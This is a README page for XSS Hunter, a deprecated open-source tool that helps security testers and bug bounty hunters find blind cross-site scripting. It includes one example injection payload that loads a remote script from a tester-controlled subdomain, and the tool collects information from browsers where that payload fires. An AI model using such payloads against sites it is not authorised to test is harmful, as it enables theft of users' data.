Home

Awesome

DEPRECATED - TRY THE NEW EXPRESS VERSION

See here for more info: https://github.com/mandatoryprogrammer/xsshunter-express

XSS Hunter Source Code

This is a portable version of the source code running on https://xsshunter.com. It is designed to be easily-installable on any server for security professionals and bug bounty hunters who wish to test for XSS in a much more powerful way.

If you don't want to set up this software and would rather just start testing, see https://xsshunter.com .

Requirements

Setup

Please see https://thehackerblog.com/xss-hunter-is-now-open-source-heres-how-to-set-it-up/ for information on how to set up XSS Hunter on your own server.

Summary of Functionality

Upon signing up you will create a special short domain such as yoursubdomain.xss.ht which identifies your XSS vulnerabilities and hosts your payload. You then use this subdomain in your XSS testing, using injection attempts such as "><script src=//yoursubdomain.xss.ht></script>. XSS Hunter will automatically serve up XSS probes and collect the resulting information when they fire.

Features

Notable Exploits

Want to Contribute?

All code was created by me and (for that reason) is likely not best practice and definitely in need of optimization/cleanup. Any pull requests are appreciated!